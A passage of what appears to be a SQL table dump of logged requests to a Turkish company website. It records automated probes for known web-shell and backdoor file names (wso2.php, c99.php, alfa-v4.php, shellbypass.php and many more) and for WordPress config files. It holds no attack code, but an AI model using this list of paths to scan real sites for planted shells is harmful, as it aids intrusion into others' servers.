00:00:00',301),(35587,'https://3s-technologies.com.tr/en/cmd.php',NULL,'www.google.com','',11,0,'2024-07-19 04:36:38','0000-00-00 00:00:00',301),(35588,'https://3s-technologies.com.tr/en/wso2.php',NULL,'www.google.com','',12,0,'2024-07-19 04:36:44','0000-00-00 00:00:00',301),(35589,'http://3s-technologies.com.tr/en/xcv.php',NULL,'www.google.com','',10,0,'2024-07-19 04:36:48','0000-00-00 00:00:00',301),(35590,'https://3s-technologies.com.tr/en/xcv.php',NULL,'www.google.com','',10,0,'2024-07-19 04:36:51','0000-00-00 00:00:00',301),(35591,'http://3s-technologies.com.tr/en/eagle.php',NULL,'www.google.com','',15,0,'2024-07-19 04:36:54','0000-00-00 00:00:00',301),(35592,'https://3s-technologies.com.tr/en/eagle.php',NULL,'www.google.com','',11,0,'2024-07-19 04:36:57','0000-00-00 00:00:00',301),(35593,'https://3s-technologies.com.tr/en/xindex.php',NULL,'www.google.com','',12,0,'2024-07-19 04:37:04','0000-00-00 00:00:00',301),(35594,'https://3s-technologies.com.tr/en/xm.php',NULL,'www.google.com','',10,0,'2024-07-19 04:37:18','0000-00-00 00:00:00',301),(35595,'https://3s-technologies.com.tr/en/xx.php',NULL,'www.google.com','',11,0,'2024-07-19 04:37:24','0000-00-00 00:00:00',301),(35596,'https://3s-technologies.com.tr/en/xxx.php',NULL,'www.google.com','',11,0,'2024-07-19 04:37:31','0000-00-00 00:00:00',301),(35597,'https://3s-technologies.com.tr/en/y.php',NULL,'www.google.com','',12,0,'2024-07-19 04:37:37','0000-00-00 00:00:00',301),(35598,'https://3s-technologies.com.tr/en/z.php',NULL,'www.google.com','',12,0,'2024-07-19 04:37:44','0000-00-00 00:00:00',301),(35599,'https://3s-technologies.com.tr/en/zk.php',NULL,'www.google.com','',11,0,'2024-07-19 04:37:51','0000-00-00 00:00:00',301),(35600,'https://3s-technologies.com.tr/en/zone.php?phpshell',NULL,'www.google.com','',1,0,'2024-07-19 04:37:57','0000-00-00 00:00:00',301),(35601,'http://3s-technologies.com.tr/en/zx.php',NULL,'www.google.com','',11,0,'2024-07-19 04:38:00','0000-00-00 00:00:00',301),(35602,'https://3s-technologies.com.tr/en/zx.php',NULL,'www.google.com','',11,0,'2024-07-19 04:38:04','0000-00-00 00:00:00',301),(35603,'http://3s-technologies.com.tr/en/symlink.php',NULL,'www.google.com','',14,0,'2024-07-19 04:38:07','0000-00-00 00:00:00',301),(35604,'https://3s-technologies.com.tr/en/symlink.php',NULL,'www.google.com','',12,0,'2024-07-19 04:38:11','0000-00-00 00:00:00',301),(35605,'https://3s-technologies.com.tr/en/c99.php',NULL,'www.google.com','',12,0,'2024-07-19 04:38:17','0000-00-00 00:00:00',301),(35606,'https://3s-technologies.com.tr/en/ok.php',NULL,'www.google.com','',12,0,'2024-07-19 04:38:24','0000-00-00 00:00:00',301),(35607,'https://3s-technologies.com.tr/en/p.php',NULL,'www.google.com','',15,0,'2024-07-19 04:39:24','0000-00-00 00:00:00',301),(35608,'https://3s-technologies.com.tr/en/q.php',NULL,'www.google.com','',11,0,'2024-07-19 04:39:31','0000-00-00 00:00:00',301),(35609,'https://3s-technologies.com.tr/en/d.php',NULL,'www.google.com','',11,0,'2024-07-19 04:39:38','0000-00-00 00:00:00',301),(35610,'https://3s-technologies.com.tr/en/f.php',NULL,'www.google.com','',11,0,'2024-07-19 04:39:44','0000-00-00 00:00:00',301),(35611,'https://3s-technologies.com.tr/en/g.php',NULL,'www.google.com','',11,0,'2024-07-19 04:39:51','0000-00-00 00:00:00',301),(35612,'https://3s-technologies.com.tr/en/h.php',NULL,'www.google.com','',11,0,'2024-07-19 04:39:58','0000-00-00 00:00:00',301),(35613,'https://3s-technologies.com.tr/en/j.php',NULL,'www.google.com','',11,0,'2024-07-19 04:40:05','0000-00-00 00:00:00',301),(35614,'http://3s-technologies.com.tr/en/wp-wso.php',NULL,'www.google.com','',15,0,'2024-07-19 04:40:09','0000-00-00 00:00:00',301),(35615,'https://3s-technologies.com.tr/en/wp-wso.php',NULL,'www.google.com','',12,0,'2024-07-19 04:40:12','0000-00-00 00:00:00',301),(35616,'http://3s-technologies.com.tr/en/function.php',NULL,'www.google.com','',24,0,'2024-07-19 04:40:15','0000-00-00 00:00:00',301),(35617,'https://3s-technologies.com.tr/en/function.php',NULL,'www.google.com','',11,0,'2024-07-19 04:40:19','0000-00-00 00:00:00',301),(35618,'https://3s-technologies.com.tr/en/www.php',NULL,'www.google.com','',12,0,'2024-07-19 04:40:33','0000-00-00 00:00:00',301),(35619,'https://3s-technologies.com.tr/en/100.php',NULL,'www.google.com','',11,0,'2024-07-19 04:40:40','0000-00-00 00:00:00',301),(35620,'http://3s-technologies.com.tr/en/777.php',NULL,'www.google.com','',13,0,'2024-07-19 04:40:45','0000-00-00 00:00:00',301),(35621,'https://3s-technologies.com.tr/en/777.php',NULL,'www.google.com','',11,0,'2024-07-19 04:40:50','0000-00-00 00:00:00',301),(35622,'http://3s-technologies.com.tr/en/xox.php',NULL,'www.google.com','',13,0,'2024-07-19 04:40:55','0000-00-00 00:00:00',301),(35623,'https://3s-technologies.com.tr/en/xox.php',NULL,'www.google.com','',11,0,'2024-07-19 04:41:01','0000-00-00 00:00:00',301),(35624,'https://3s-technologies.com.tr/en/new.php',NULL,'www.google.com','',12,0,'2024-07-19 04:41:12','0000-00-00 00:00:00',301),(35625,'http://3s-technologies.com.tr/en/wi.php',NULL,'www.google.com','',13,0,'2024-07-19 04:41:18','0000-00-00 00:00:00',301),(35626,'https://3s-technologies.com.tr/en/wi.php',NULL,'www.google.com','',11,0,'2024-07-19 04:41:23','0000-00-00 00:00:00',301),(35627,'http://3s-technologies.com.tr/en/admin403.php',NULL,'www.google.com','',11,0,'2024-07-19 04:41:26','0000-00-00 00:00:00',301),(35628,'https://3s-technologies.com.tr/en/admin403.php',NULL,'www.google.com','',11,0,'2024-07-19 04:41:30','0000-00-00 00:00:00',301),(35629,'https://3s-technologies.com.tr/en/haxor.php',NULL,'www.google.com','',12,0,'2024-07-19 04:41:45','0000-00-00 00:00:00',301),(35630,'https://3s-technologies.com.tr/en/hello.php',NULL,'www.google.com','',12,0,'2024-07-19 04:41:52','0000-00-00 00:00:00',301),(35631,'http://3s-technologies.com.tr/en/if.php',NULL,'www.google.com','',14,0,'2024-07-19 04:41:55','0000-00-00 00:00:00',301),(35632,'https://3s-technologies.com.tr/en/if.php',NULL,'www.google.com','',12,0,'2024-07-19 04:41:59','0000-00-00 00:00:00',301),(35633,'http://3s-technologies.com.tr/en/anone.php',NULL,'www.google.com','',14,0,'2024-07-19 04:42:03','0000-00-00 00:00:00',301),(35634,'https://3s-technologies.com.tr/en/anone.php',NULL,'www.google.com','',11,0,'2024-07-19 04:42:07','0000-00-00 00:00:00',301),(35635,'http://3s-technologies.com.tr/en/wp-configer.php',NULL,'www.google.com','',14,0,'2024-07-19 04:42:11','0000-00-00 00:00:00',301),(35636,'https://3s-technologies.com.tr/en/wp-configer.php',NULL,'www.google.com','',12,0,'2024-07-19 04:42:14','0000-00-00 00:00:00',301),(35637,'http://3s-technologies.com.tr/en/wp-ad.php',NULL,'www.google.com','',14,0,'2024-07-19 04:42:18','0000-00-00 00:00:00',301),(35638,'https://3s-technologies.com.tr/en/wp-ad.php',NULL,'www.google.com','',12,0,'2024-07-19 04:42:21','0000-00-00 00:00:00',301),(35639,'http://3s-technologies.com.tr/en/send.php',NULL,'www.google.com','',14,0,'2024-07-19 04:42:25','0000-00-00 00:00:00',301),(35640,'https://3s-technologies.com.tr/en/send.php',NULL,'www.google.com','',12,0,'2024-07-19 04:42:29','0000-00-00 00:00:00',301),(35641,'http://3s-technologies.com.tr/en/.wp-cache.php',NULL,'www.google.com','',14,0,'2024-07-19 04:42:32','0000-00-00 00:00:00',301),(35642,'https://3s-technologies.com.tr/en/.wp-cache.php',NULL,'www.google.com','',12,0,'2024-07-19 04:42:36','0000-00-00 00:00:00',301),(35643,'https://3s-technologies.com.tr/en/wp-blog.php',NULL,'www.google.com','',13,0,'2024-07-19 04:42:43','0000-00-00 00:00:00',301),(35644,'http://3s-technologies.com.tr/en/gg.php',NULL,'www.google.com','',85,0,'2024-07-19 04:42:46','0000-00-00 00:00:00',301),(35645,'https://3s-technologies.com.tr/en/gg.php',NULL,'www.google.com','',11,0,'2024-07-19 04:42:50','0000-00-00 00:00:00',301),(35646,'http://3s-technologies.com.tr/en/alfa123.php',NULL,'www.google.com','',14,0,'2024-07-19 04:42:54','0000-00-00 00:00:00',301),(35647,'https://3s-technologies.com.tr/en/alfa123.php',NULL,'www.google.com','',12,0,'2024-07-19 04:42:57','0000-00-00 00:00:00',301),(35648,'https://3s-technologies.com.tr/en/sites/favicon.ico',NULL,'','',1,0,'2024-07-21 18:59:42','0000-00-00 00:00:00',301),(35649,'https://3s-technologies.com.tr/en/sites/favicon.png',NULL,'','',1,0,'2024-07-21 18:59:44','0000-00-00 00:00:00',301),(35650,'http://3s-technologies.com.tr/tr/administrator/components/com_shell/shell.xml',NULL,'','',1,0,'2024-07-22 00:41:25','0000-00-00 00:00:00',301),(35651,'http://www.3s-technologies.com.tr/en/packages/barryvdh/elfinder/js/elfinder.min.js',NULL,'','',1,0,'2024-07-22 07:53:51','0000-00-00 00:00:00',301),(35652,'https://www.3s-technologies.com.tr/en/packages/barryvdh/elfinder/js/elfinder.min.js',NULL,'','',1,0,'2024-07-22 07:53:57','0000-00-00 00:00:00',301),(35653,'http://3s-technologies.com.tr/en/var.php',NULL,'www.google.com','',9,0,'2024-07-22 20:08:23','0000-00-00 00:00:00',301),(35654,'https://3s-technologies.com.tr/en/var.php',NULL,'www.google.com','',9,0,'2024-07-22 20:08:26','0000-00-00 00:00:00',301),(35655,'https://3s-technologies.com.tr/en/includes.php',NULL,'www.google.com','',9,0,'2024-07-22 20:10:28','0000-00-00 00:00:00',301),(35656,'http://3s-technologies.com.tr/en/wp-inlcudes.php',NULL,'www.google.com','',10,0,'2024-07-22 20:16:08','0000-00-00 00:00:00',301),(35657,'https://3s-technologies.com.tr/en/wp-inlcudes.php',NULL,'www.google.com','',10,0,'2024-07-22 20:16:11','0000-00-00 00:00:00',301),(35658,'http://3s-technologies.com.tr/en/wp-js.php',NULL,'www.google.com','',10,0,'2024-07-22 20:16:14','0000-00-00 00:00:00',301),(35659,'https://3s-technologies.com.tr/en/wp-js.php',NULL,'www.google.com','',10,0,'2024-07-22 20:16:17','0000-00-00 00:00:00',301),(35660,'https://3s-technologies.com.tr/en/wp-load.php',NULL,'www.google.com','',11,0,'2024-07-22 20:16:22','0000-00-00 00:00:00',301),(35661,'http://3s-technologies.com.tr/en/error.php',NULL,'www.google.com','',14,0,'2024-07-22 20:21:27','0000-00-00 00:00:00',301),(35662,'https://3s-technologies.com.tr/en/error.php',NULL,'www.google.com','',12,0,'2024-07-22 20:21:30','0000-00-00 00:00:00',301),(35663,'http://3s-technologies.com.tr/en/zone.php',NULL,'www.google.com','',10,0,'2024-07-22 20:31:50','0000-00-00 00:00:00',301),(35664,'https://3s-technologies.com.tr/en/zone.php',NULL,'www.google.com','',10,0,'2024-07-22 20:31:53','0000-00-00 00:00:00',301),(35665,'http://3s-technologies.com.tr/en/aman.php',NULL,'www.google.com','',8,0,'2024-07-22 20:35:04','0000-00-00 00:00:00',301),(35666,'https://3s-technologies.com.tr/en/aman.php',NULL,'www.google.com','',8,0,'2024-07-22 20:35:07','0000-00-00 00:00:00',301),(35667,'http://3s-technologies.com.tr/en/am4n.php',NULL,'www.google.com','',8,0,'2024-07-22 20:35:10','0000-00-00 00:00:00',301),(35668,'https://3s-technologies.com.tr/en/am4n.php',NULL,'www.google.com','',8,0,'2024-07-22 20:35:14','0000-00-00 00:00:00',301),(35669,'http://3s-technologies.com.tr/en/cocot.php',NULL,'www.google.com','',8,0,'2024-07-22 20:35:24','0000-00-00 00:00:00',301),(35670,'https://3s-technologies.com.tr/en/cocot.php',NULL,'www.google.com','',8,0,'2024-07-22 20:35:27','0000-00-00 00:00:00',301),(35671,'http://3s-technologies.com.tr/en/ghostsec.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:30','0000-00-00 00:00:00',301),(35672,'https://3s-technologies.com.tr/en/ghostsec.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:34','0000-00-00 00:00:00',301),(35673,'http://3s-technologies.com.tr/en/sunda.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:37','0000-00-00 00:00:00',301),(35674,'https://3s-technologies.com.tr/en/sunda.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:40','0000-00-00 00:00:00',301),(35675,'http://3s-technologies.com.tr/en/sundaxploit.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:43','0000-00-00 00:00:00',301),(35676,'https://3s-technologies.com.tr/en/sundaxploit.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:47','0000-00-00 00:00:00',301),(35677,'http://3s-technologies.com.tr/en/you.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:50','0000-00-00 00:00:00',301),(35678,'https://3s-technologies.com.tr/en/you.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:53','0000-00-00 00:00:00',301),(35679,'http://3s-technologies.com.tr/en/name.php',NULL,'www.google.com','',9,0,'2024-07-22 20:35:57','0000-00-00 00:00:00',301),(35680,'https://3s-technologies.com.tr/en/name.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:01','0000-00-00 00:00:00',301),(35681,'http://3s-technologies.com.tr/en/uct.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:04','0000-00-00 00:00:00',301),(35682,'https://3s-technologies.com.tr/en/uct.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:08','0000-00-00 00:00:00',301),(35683,'http://3s-technologies.com.tr/en/symlink403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:11','0000-00-00 00:00:00',301),(35684,'https://3s-technologies.com.tr/en/symlink403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:14','0000-00-00 00:00:00',301),(35685,'http://3s-technologies.com.tr/en/word.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:24','0000-00-00 00:00:00',301),(35686,'https://3s-technologies.com.tr/en/word.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:28','0000-00-00 00:00:00',301),(35687,'http://3s-technologies.com.tr/en/blacksec.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:31','0000-00-00 00:00:00',301),(35688,'https://3s-technologies.com.tr/en/blacksec.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:35','0000-00-00 00:00:00',301),(35689,'http://3s-technologies.com.tr/en/siapa.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:38','0000-00-00 00:00:00',301),(35690,'https://3s-technologies.com.tr/en/siapa.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:42','0000-00-00 00:00:00',301),(35691,'https://3s-technologies.com.tr/en/security.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:48','0000-00-00 00:00:00',301),(35692,'http://3s-technologies.com.tr/en/ilusi.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:52','0000-00-00 00:00:00',301),(35693,'https://3s-technologies.com.tr/en/ilusi.php',NULL,'www.google.com','',9,0,'2024-07-22 20:36:55','0000-00-00 00:00:00',301),(35694,'http://3s-technologies.com.tr/en/8890.php',NULL,'www.google.com','',8,0,'2024-07-22 20:36:59','0000-00-00 00:00:00',301),(35695,'https://3s-technologies.com.tr/en/8890.php',NULL,'www.google.com','',8,0,'2024-07-22 20:37:02','0000-00-00 00:00:00',301),(35696,'http://3s-technologies.com.tr/en/ucp.php',NULL,'www.google.com','',9,0,'2024-07-22 20:37:05','0000-00-00 00:00:00',301),(35697,'https://3s-technologies.com.tr/en/ucp.php',NULL,'www.google.com','',9,0,'2024-07-22 20:37:09','0000-00-00 00:00:00',301),(35698,'http://3s-technologies.com.tr/en/kct.php',NULL,'www.google.com','',9,0,'2024-07-22 20:37:12','0000-00-00 00:00:00',301),(35699,'https://3s-technologies.com.tr/en/kct.php',NULL,'www.google.com','',9,0,'2024-07-22 20:37:16','0000-00-00 00:00:00',301),(35700,'http://3s-technologies.com.tr/en/click.php',NULL,'www.google.com','',17,0,'2024-07-22 20:37:19','0000-00-00 00:00:00',301),(35701,'https://3s-technologies.com.tr/en/click.php',NULL,'www.google.com','',9,0,'2024-07-22 20:37:23','0000-00-00 00:00:00',301),(35702,'https://3s-technologies.com.tr/en/defaults.php',NULL,'www.google.com','',8,0,'2024-07-22 20:37:36','0000-00-00 00:00:00',301),(35703,'http://3s-technologies.com.tr/en/install.php',NULL,'www.google.com','',58,0,'2024-07-22 20:37:46','0000-00-00 00:00:00',301),(35704,'https://3s-technologies.com.tr/en/install.php',NULL,'www.google.com','',9,0,'2024-07-22 20:37:49','0000-00-00 00:00:00',301),(35705,'https://3s-technologies.com.tr/en/license.php',NULL,'www.google.com','',10,0,'2024-07-22 20:37:56','0000-00-00 00:00:00',301),(35706,'http://3s-technologies.com.tr/en/product.php',NULL,'www.google.com','',11,0,'2024-07-22 20:38:00','0000-00-00 00:00:00',301),(35707,'https://3s-technologies.com.tr/en/product.php',NULL,'www.google.com','',8,0,'2024-07-22 20:38:04','0000-00-00 00:00:00',301),(35708,'https://3s-technologies.com.tr/en/search.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:11','0000-00-00 00:00:00',301),(35709,'http://3s-technologies.com.tr/en/special.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:14','0000-00-00 00:00:00',301),(35710,'https://3s-technologies.com.tr/en/special.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:17','0000-00-00 00:00:00',301),(35711,'http://3s-technologies.com.tr/en/wp-activate.php',NULL,'www.google.com','',16,0,'2024-07-22 20:38:20','0000-00-00 00:00:00',301),(35712,'https://3s-technologies.com.tr/en/wp-activate.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:24','0000-00-00 00:00:00',301),(35713,'http://3s-technologies.com.tr/en/wp-blog-header.php',NULL,'www.google.com','',22,0,'2024-07-22 20:38:27','0000-00-00 00:00:00',301),(35714,'https://3s-technologies.com.tr/en/wp-blog-header.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:30','0000-00-00 00:00:00',301),(35715,'http://3s-technologies.com.tr/en/wp-comments-post.php',NULL,'www.google.com','',13,0,'2024-07-22 20:38:33','0000-00-00 00:00:00',301),(35716,'https://3s-technologies.com.tr/en/wp-comments-post.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:37','0000-00-00 00:00:00',301),(35717,'http://3s-technologies.com.tr/en/wp-config.php',NULL,'www.google.com','',12,0,'2024-07-22 20:38:40','0000-00-00 00:00:00',301),(35718,'https://3s-technologies.com.tr/en/wp-config.php',NULL,'www.google.com','',10,0,'2024-07-22 20:38:43','0000-00-00 00:00:00',301),(35719,'http://3s-technologies.com.tr/en/wp-configs.php',NULL,'www.google.com','',14,0,'2024-07-22 20:38:47','0000-00-00 00:00:00',301),(35720,'https://3s-technologies.com.tr/en/wp-configs.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:50','0000-00-00 00:00:00',301),(35721,'http://3s-technologies.com.tr/en/wp-cron.php',NULL,'www.google.com','',23,0,'2024-07-22 20:38:54','0000-00-00 00:00:00',301),(35722,'https://3s-technologies.com.tr/en/wp-cron.php',NULL,'www.google.com','',9,0,'2024-07-22 20:38:58','0000-00-00 00:00:00',301),(35723,'http://3s-technologies.com.tr/en/wp-foter.php',NULL,'www.google.com','',8,0,'2024-07-22 20:39:01','0000-00-00 00:00:00',301),(35724,'https://3s-technologies.com.tr/en/wp-foter.php',NULL,'www.google.com','',8,0,'2024-07-22 20:39:04','0000-00-00 00:00:00',301),(35725,'http://3s-technologies.com.tr/en/wp-links-opml.php',NULL,'www.google.com','',20,0,'2024-07-22 20:39:14','0000-00-00 00:00:00',301),(35726,'https://3s-technologies.com.tr/en/wp-links-opml.php',NULL,'www.google.com','',9,0,'2024-07-22 20:39:18','0000-00-00 00:00:00',301),(35727,'http://3s-technologies.com.tr/en/wp-mail.php',NULL,'www.google.com','',24,0,'2024-07-22 20:39:29','0000-00-00 00:00:00',301),(35728,'https://3s-technologies.com.tr/en/wp-mail.php',NULL,'www.google.com','',9,0,'2024-07-22 20:39:32','0000-00-00 00:00:00',301),(35729,'http://3s-technologies.com.tr/en/wp-signup.php',NULL,'www.google.com','',20,0,'2024-07-22 20:39:35','0000-00-00 00:00:00',301),(35730,'https://3s-technologies.com.tr/en/wp-signup.php',NULL,'www.google.com','',9,0,'2024-07-22 20:39:39','0000-00-00 00:00:00',301),(35731,'http://3s-technologies.com.tr/en/wp-trackback.php',NULL,'www.google.com','',48,0,'2024-07-22 20:39:42','0000-00-00 00:00:00',301),(35732,'https://3s-technologies.com.tr/en/wp-trackback.php',NULL,'www.google.com','',9,0,'2024-07-22 20:39:45','0000-00-00 00:00:00',301),(35733,'http://3s-technologies.com.tr/en/xinder.php',NULL,'www.google.com','',10,0,'2024-07-22 20:39:48','0000-00-00 00:00:00',301),(35734,'https://3s-technologies.com.tr/en/xinder.php',NULL,'www.google.com','',8,0,'2024-07-22 20:39:52','0000-00-00 00:00:00',301),(35735,'http://3s-technologies.com.tr/en/kct403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:39:55','0000-00-00 00:00:00',301),(35736,'https://3s-technologies.com.tr/en/kct403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:39:59','0000-00-00 00:00:00',301),(35737,'http://3s-technologies.com.tr/en/shellbypass.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:04','0000-00-00 00:00:00',301),(35738,'https://3s-technologies.com.tr/en/shellbypass.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:08','0000-00-00 00:00:00',301),(35739,'http://3s-technologies.com.tr/en/mwmek.php',NULL,'www.google.com','',8,0,'2024-07-22 20:40:11','0000-00-00 00:00:00',301),(35740,'https://3s-technologies.com.tr/en/mwmek.php',NULL,'www.google.com','',8,0,'2024-07-22 20:40:14','0000-00-00 00:00:00',301),(35741,'http://3s-technologies.com.tr/en/findes.php',NULL,'www.google.com','',8,0,'2024-07-22 20:40:17','0000-00-00 00:00:00',301),(35742,'https://3s-technologies.com.tr/en/findes.php',NULL,'www.google.com','',8,0,'2024-07-22 20:40:20','0000-00-00 00:00:00',301),(35743,'http://3s-technologies.com.tr/en/cot.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:24','0000-00-00 00:00:00',301),(35744,'https://3s-technologies.com.tr/en/cot.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:27','0000-00-00 00:00:00',301),(35745,'http://3s-technologies.com.tr/en/groupon.php',NULL,'www.google.com','',8,0,'2024-07-22 20:40:30','0000-00-00 00:00:00',301),(35746,'https://3s-technologies.com.tr/en/groupon.php',NULL,'www.google.com','',8,0,'2024-07-22 20:40:34','0000-00-00 00:00:00',301),(35747,'http://3s-technologies.com.tr/en/ap.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:37','0000-00-00 00:00:00',301),(35748,'https://3s-technologies.com.tr/en/ap.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:40','0000-00-00 00:00:00',301),(35749,'http://3s-technologies.com.tr/en/xforce.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:43','0000-00-00 00:00:00',301),(35750,'https://3s-technologies.com.tr/en/xforce.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:46','0000-00-00 00:00:00',301),(35751,'http://3s-technologies.com.tr/en/wsopriv.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:50','0000-00-00 00:00:00',301),(35752,'https://3s-technologies.com.tr/en/wsopriv.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:53','0000-00-00 00:00:00',301),(35753,'http://3s-technologies.com.tr/en/wso403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:40:56','0000-00-00 00:00:00',301),(35754,'https://3s-technologies.com.tr/en/wso403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:00','0000-00-00 00:00:00',301),(35755,'http://3s-technologies.com.tr/en/omest.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:03','0000-00-00 00:00:00',301),(35756,'https://3s-technologies.com.tr/en/omest.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:06','0000-00-00 00:00:00',301),(35757,'http://3s-technologies.com.tr/en/omest403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:10','0000-00-00 00:00:00',301),(35758,'https://3s-technologies.com.tr/en/omest403.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:13','0000-00-00 00:00:00',301),(35759,'http://3s-technologies.com.tr/en/shellsiapa.php',NULL,'www.google.com','',8,0,'2024-07-22 20:41:16','0000-00-00 00:00:00',301),(35760,'https://3s-technologies.com.tr/en/shellsiapa.php',NULL,'www.google.com','',8,0,'2024-07-22 20:41:19','0000-00-00 00:00:00',301),(35761,'http://3s-technologies.com.tr/en/racing.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:23','0000-00-00 00:00:00',301),(35762,'https://3s-technologies.com.tr/en/racing.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:26','0000-00-00 00:00:00',301),(35763,'http://3s-technologies.com.tr/en/images.php',NULL,'www.google.com','',10,0,'2024-07-22 20:41:29','0000-00-00 00:00:00',301),(35764,'https://3s-technologies.com.tr/en/images.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:33','0000-00-00 00:00:00',301),(35765,'http://3s-technologies.com.tr/en/hunter.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:36','0000-00-00 00:00:00',301),(35766,'https://3s-technologies.com.tr/en/hunter.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:39','0000-00-00 00:00:00',301),(35767,'http://3s-technologies.com.tr/en/dragonforce.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:43','0000-00-00 00:00:00',301),(35768,'https://3s-technologies.com.tr/en/dragonforce.php',NULL,'www.google.com','',9,0,'2024-07-22 20:41:46','0000-00-00 00:00:00',301),(35769,'http://3s-technologies.com.tr/en/mcc.php',NULL,'www.google.com','',8,0,'2024-07-22 20:41:49','0000-00-00 00:00:00',301),(35770,'https://3s-technologies.com.tr/en/mcc.php',NULL,'www.google.com','',8,0,'2024-07-22 20:41:53','0000-00-00 00:00:00',301),(35771,'http://3s-technologies.com.tr/en/antek.php',NULL,'www.google.com','',8,0,'2024-07-22 20:41:56','0000-00-00 00:00:00',301),(35772,'https://3s-technologies.com.tr/en/antek.php',NULL,'www.google.com','',8,0,'2024-07-22 20:42:00','0000-00-00 00:00:00',301),(35773,'http://3s-technologies.com.tr/en/wp-hoard.php',NULL,'www.google.com','',11,0,'2024-07-22 20:42:03','0000-00-00 00:00:00',301),(35774,'https://3s-technologies.com.tr/en/wp-hoard.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:06','0000-00-00 00:00:00',301),(35775,'http://3s-technologies.com.tr/en/lv.php',NULL,'www.google.com','',18,0,'2024-07-22 20:42:09','0000-00-00 00:00:00',301),(35776,'https://3s-technologies.com.tr/en/lv.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:13','0000-00-00 00:00:00',301),(35777,'http://3s-technologies.com.tr/en/bkv74.php',NULL,'www.google.com','',8,0,'2024-07-22 20:42:16','0000-00-00 00:00:00',301),(35778,'https://3s-technologies.com.tr/en/bkv74.php',NULL,'www.google.com','',8,0,'2024-07-22 20:42:19','0000-00-00 00:00:00',301),(35779,'http://3s-technologies.com.tr/en/xdmah.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:23','0000-00-00 00:00:00',301),(35780,'https://3s-technologies.com.tr/en/xdmah.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:26','0000-00-00 00:00:00',301),(35781,'http://3s-technologies.com.tr/en/jadow.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:30','0000-00-00 00:00:00',301),(35782,'https://3s-technologies.com.tr/en/jadow.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:33','0000-00-00 00:00:00',301),(35783,'http://3s-technologies.com.tr/en/1100.php',NULL,'www.google.com','',11,0,'2024-07-22 20:42:36','0000-00-00 00:00:00',301),(35784,'https://3s-technologies.com.tr/en/1100.php',NULL,'www.google.com','',8,0,'2024-07-22 20:42:40','0000-00-00 00:00:00',301),(35785,'http://3s-technologies.com.tr/en/xl2023x.php',NULL,'www.google.com','',8,0,'2024-07-22 20:42:43','0000-00-00 00:00:00',301),(35786,'https://3s-technologies.com.tr/en/xl2023x.php',NULL,'www.google.com','',8,0,'2024-07-22 20:42:47','0000-00-00 00:00:00',301),(35787,'http://3s-technologies.com.tr/en/minipriv.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:50','0000-00-00 00:00:00',301),(35788,'https://3s-technologies.com.tr/en/minipriv.php',NULL,'www.google.com','',9,0,'2024-07-22 20:42:53','0000-00-00 00:00:00',301),(35789,'http://3s-technologies.com.tr/en/bs.php7',NULL,'www.google.com','',9,0,'2024-07-22 20:42:56','0000-00-00 00:00:00',301),(35790,'https://3s-technologies.com.tr/en/bs.php7',NULL,'www.google.com','',9,0,'2024-07-22 20:42:59','0000-00-00 00:00:00',301),(35791,'http://3s-technologies.com.tr/en/use.php',NULL,'www.google.com','',11,0,'2024-07-22 20:43:03','0000-00-00 00:00:00',301),(35792,'https://3s-technologies.com.tr/en/use.php',NULL,'www.google.com','',9,0,'2024-07-22 20:43:06','0000-00-00 00:00:00',301),(35793,'http://3s-technologies.com.tr/en/alfa-v4.php',NULL,'www.google.com','',9,0,'2024-07-22 20:43:09','0000-00-00 